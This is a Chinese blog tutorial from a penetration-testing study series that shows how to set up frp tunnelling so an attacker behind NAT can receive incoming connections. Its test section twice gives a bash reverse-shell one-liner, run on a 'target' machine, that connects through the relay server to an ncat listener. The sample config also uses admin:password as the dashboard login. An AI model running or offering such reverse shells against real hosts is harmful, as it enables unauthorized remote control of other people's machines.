通过Frp解决实现内网穿透

最新推荐文章于 2024-05-07 22:12:36 发布
最新推荐文章于 2024-05-07 22:12:36 发布
阅读量2.3k 收藏 17
点赞数 2
分类专栏: 安全 文章标签: 网络 安全 运维 frp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/126422508
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)

介绍

内网穿透

内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。
摘自:百度百科

简单来说,ipv4的ip是有限的,大概256^4个,差不多42.9亿个,如果每台设备都分配一个ip,那ip很快就不够分了。因此,提出了内网域的概念。

我们平时使用的计算机,如果在命令行中输入ipconfig或者ip a,可以看到自己的ip地址。
在这里插入图片描述
这里我的ip是192.168.1.9,这是一个内网的ip,中国电信提供的内网ip都是:192.168.*.* ,这样有了内网域,再配合网关,就可以实现几台计算机共享一个ip。这样的一个环境统称局域网。多个局域网交织在一起,叫做广域网。

但这样就会出现一个问题,我的电脑是在内网环境中,如果其他计算机想与我建立通信,是无法连接到我的计算机的。

假如我们想要建立一个网站,或者对外提供某项服务。关于网络安全的,ncat监听,msfconsole监听,都需要其他计算机进行主动连接,但由于我是内网环境,无法直接连接,导致无法实现。

获取公网ip的方法网上教程很多,可以自行查询。

在这里介绍内网穿透技术。

内网穿透技术的工作方式大概可以通过这样一张图表示
在这里插入图片描述
通过间接的方式实现攻击机和目标机的连接。

内网穿透工具

在这里推荐我之前一直用的内网穿透工具:Sakura frp
官网:https://www.natfrp.com/
通过该软件,可以轻松实现内网穿透,普通用户可添加两条隧道,限速为10mb/s,每天可以签到拿流量

这个软件,注册是免费的,开隧道是免费的,搭服务也是免费的,但签到要实名,实名资格要一块钱。

该软件不是今天介绍的重点,感兴趣的可以自行了解

frp

frp 是一个高性能的反向代理应用,支持 tcp, udp, http, https 协议。
摘自:百度百科

这里需要有一台公网服务器,最好是linux的,获取方式大家懂得都懂,如果没有的话可以走了。

使用实例

在这里举一个实例。
首先这里有三台计算机,两台有公网ip,一台,即我自己的计算机,内网。
由于是真实环境,所有IP我都会进行处理
Server:121.-.-.-
Target:60.-.-.-
Me:192.168.1.9

首先在公网服务器上,开启frps服务

接下来在自己电脑上运行frpc
在这里插入图片描述
此时内网穿透已经建立成功。

其中,我讲自己电脑上的1234端口映射到远程服务器的6000端口,在本地我打开ncat监听
在这里插入图片描述

在目标机上执行回显命令

bash -c 'exec bash -i &>/dev/tcp/121.-.-.-/6000 <&1'

在这里插入图片描述
可以看到我自己的电脑成功收到了回显

在这里插入图片描述

安装

GitHub:https://github.com/fatedier/frp/releases
去官网分别下载相同版本的linux和windows的压缩包(根据自身情况而定)
例如,我在这里下的是这两个
在这里插入图片描述
windows系统直接解压即可
在这里插入图片描述
把Linux的压缩包移到服务器上,输入

tar -zxvf frp_0.44.0_linux_amd64.tar.gz

解压
在这里插入图片描述

服务端配置

给文件夹先改个名字
在这里插入图片描述
cd进去,可以看到
在这里插入图片描述
其中,frps是服务器端的启动文件,frps.ini是配置文件

vim编辑frps.ini,修改内容如下

[common]
bind_port = 7030
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = password
log_file = ./frps.log
max_pool_count = 50

参数

  • bing_port :重要,自己的电脑连接的端口
  • dashboard_port : Web端的端口
  • dashboard_user :Web端登录账号
  • dashboard_pass :Web端登录密码
  • log_file :日志输出位置
  • max_pool_count :最大连接数

这里像我一样配置就好了,当然,你也可以自己改
在这里插入图片描述

服务端启动

输入

./frps -c ./frps.ini

启动
在这里插入图片描述
此时访问该服务器的7500端口,看到web界面即为启动成功
在这里插入图片描述
用户名和密码是之前配置文件的用户名和密码,比如我配置的是admin:password
在这里插入图片描述

客户端配置

修改frpc.ini

[common]
server_addr = 服务端的IP
server_port = 7030

[reverse1]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 6000

[reverse2]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 6001

参数:

  • server_addr : 服务器的IP
  • server_port : 服务器配置的端口

类似

[reverse1]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 6000

就是我配置的内网穿透,在这里我分别开了两条隧道,分别打到我的1234端口和7777端口,对应服务器的6000和6001端口

想要开隧道就像这样开就好了,type表示协议

客户端启动

命令行输入:

frpc.exe -c frpc.ini

在这里我是建了一个bat文件,方便启动

启动如下
在这里插入图片描述

注:要先启动服务端,否则就是这样

在这里插入图片描述
启动之后,web界面可以看到开启的隧道
在这里插入图片描述

测试

在这里以本地端口的1234,对应远程端口6000测试

本地ncat监听

ncat -lvvp 1234

目标靶机执行回显指令

bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/6000 <&1'

成功回显
在这里插入图片描述

此时在web端可看到传输了数据
在这里插入图片描述

漫路在线
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
配置frp实现内网穿透.docx
11-07
Linux系统上配置frp实现内网穿透方法,请需要的朋友们尽快下载 Linux系统上配置frp实现内网穿透方法,请需要的朋友们尽快下载
基于Frp内网穿透
10-30
1、基于Frp做的内网穿透Ui,能够通过界面一键配置 2、需要有一个云服务器 有公网Ip 3、支持端口到端口、域名访问、点对点 4、支持服务器端、客户端、点对点被访问端 如果不知道怎么配置可以联系我
frp 内网穿透
wudiansheng的博客
10-16 467
1、下载frp linux、window版本 文件在百度云盘里 2、文件配置 将frps及frps.ini放到具有公网 IP 的机器上。 将frpc及frpc.ini放到处于内网环境的机器上。 3、样例 fprs.ini [common] bind_port = 19121 token = *** max_pool_count = 100 执行命令:./frps -c ./frps.ini frpc.ini [common] server_addr = 公网...
内网穿透frp、termite、异地组网、安卓手机搭建web
freeking101的博客
01-30 1万+
内网穿透 --- frp、termite、Android手机搭建个人服务器
frp内网穿透服务搭建与使用
最新发布
ernesto的博客
05-07 363
【代码】frp内网穿透服务搭建与使用。
FRPc内网穿透封装成windows 服务,自启动
vippomelo的博客
01-21 1257
1.此处需要使用到winsw 下载地址: https://github.com/kohsuke/winsw/releases 2.下载解压至任意目录并CD进入; 这里将下载WinSw.Net4.exe重命名为winsw.exe了,以方便后面操作; 3.创建与winsw同名的配置文件,后缀为xml 此处以配置FRP客户端为例: <service> <!-- 该服务的唯一标识 --> <id>frp</id> <!-- 该服务的名...
内网穿透工具frp介绍与安装
x1172031988的专栏
08-12 1354
frp介绍 PS:以下所有操作均基于CentOS7环境 frp是一个内网穿透工具,你可以通过frp反向代理你的服务,以便你可以通过公网访问内网服务。frp采用的是C/S架构,将服务端部署在具有公网IP的机器上,客户端部署在内网或放火墙上,通过访问暴露在服务器上的端口,反向代理到处于内网的服务。frp支持TCP,UDP,HTTP,HTTP,SSH等多种协议,提供了加密、压缩、身份认证、代理限速、负载均衡等众多能力。其是用go语言编写的,具体源码可以访问github frp安装 访问Release,下载最
使用FRP实现内网穿透
m0_52973297的博客
05-03 9447
使用FRP实现内网穿透,远程访问内网服务器
5,树莓派3B+ 使用 Frp 实现内网穿透,公网访问web服务器,设置自动启动,后台运行。 (新人向)
超级业余玩家
05-01 4281
内网穿透 就是让没有固定公网 ip 的内网的服务器,暴露在公网之上,从而在外网可以访问。 基于这个工具,不但可以让外部网络访问内网的web服务器,也可以访问我们自建的NAS服务器(私有云)等等,各种网络服务,相当于有了固定的公网ip 。 可以实现内网穿透的工具有很多,这里用到的工具就是非常简单又好用的反向代理Frp !(详细介绍) 上一篇,在树莓派3B+ (Raspbian 4.14...
内网穿透工具frp原理和使用教程
weixin_43866043的博客
04-23 1万+
内网穿透frp原理和详细流程
frp32位最新版内网穿透客户端工具
09-07
frp32位最新版内网穿透客户端工具。frpc是一款非常专业的Windows客户端内网穿透工具。它的功能十分强大,可以帮助您轻松地进行内网穿透,对外网提供服务,支持 tcp, http, https 等协议类型。
内网穿透FRP工具 windows 客户端和服务端 V0.46
03-02
frp 是什么?...frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 帮助文档 ...
frp内网穿透
01-09
内网服务器 – 客户端 frp 二、 frp下载 frp下载地址 https://github.com/fatedier/frp/releases linux平台下载的版本为:frp_版本号linux_amd64.tar.gz 解压 tar -zxvf 文件名 文件解压后: frps(frp服务端运行文件)...
【计算机网络相关】内网穿透介绍以及使用FRP实现内网穿透Windows远程桌面
Chaos的博客
12-04 9450
内网穿透介绍以及使用FRP实现内网穿透Windows远程桌面。利用内网穿透技术,将内网的一些设备的数据包进行转发,从而实现公网环境访问内网的设备。公网服务器充当的是一个数据交换的作用,我们访问公网IP,然后公网服务器将我们访问的数据转发到内网设备的IP,内网设备将数据在转发给公网服务器,公网服务器将数据转发给本地客户机,从而实现内网穿透,在任何地方访问内网设备。
frp 内网穿透 多系统 多模式(详细+多个应用)
ziqibit的博客
03-13 2万+
frp内网穿透的跨平台,多模式(包括点对点)的超详细教程,可直接复制使用
frp开源工具,实现内网穿透(详细教程)
热门推荐
qq_40903527的博客
03-30 2万+
frp内网穿透方式,简单几步就能实现外网成功访问
内网穿透基础知识
木头征的博客
07-15 416
内网穿透
FRP内网穿透(linux->windows)
weixin_43762303的博客
02-15 1202
Frp内网穿透
通过frp搭建属于自己的免费稳定的内网穿透服务
发现问题,面对问题,分析问题,解决问题,总结问题
05-23 4596
之前的开发中,使用的内网穿透工具都是natapp,虽然该工具用起来很简单,但是每次重启都会变动域名,而且因为是免费的隧道传输上也被限制了,使用起来也很卡,所以也一直希望能够找到一款稳定的免费的内网穿透工具。frp是开源内网穿透软件,需要自己搭建服务器端和客户端,域名和带宽都是由自己提供的,所以也不存在随机域名和网速限制的情况
frp工具实现内网穿透
08-15
frp是一款开源的内网穿透工具,它可以帮助用户在内网环境中访问外部网络。通过使用frp,用户可以将内网中的服务暴露给外部网络,并且可以通过外部网络访问这些服务。 要实现内网穿透,首先需要在内网中部署一个frp服务器,然后在外网中部署一个frp客户端。通过在客户端和服务器之间建立一个安全的通信通道,frp可以将外部网络请求转发到内网的目标服务上。 以下是实现内网穿透的基本步骤: 1. 下载并安装frp工具。你可以从frp官方网站或者GitHub上获取frp的最新版本。 2. 在内网中的一台服务器上配置并启动frp服务器。你需要编辑frps.ini配置文件,指定服务器监听的端口、认证信息等。然后运行frps命令启动服务器。 3. 在外网中的客户端上配置并启动frp客户端。你需要编辑frpc.ini配置文件,指定服务器地址、端口、认证信息等。然后运行frpc命令启动客户端。 4. 配置端口转发规则。在frps.ini配置文件中,你可以指定需要转发的端口及其对应的目标服务地址和端口。 5. 测试内网穿透是否成功。你可以尝试通过外网访问内网中的服务,如果能够正常访问,则表示内网穿透已经成功实现。 需要注意的是,使用frp进行内网穿透可能涉及到网络安全和防火墙配置等方面的问题,建议在使用之前了解相关知识并确保操作安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值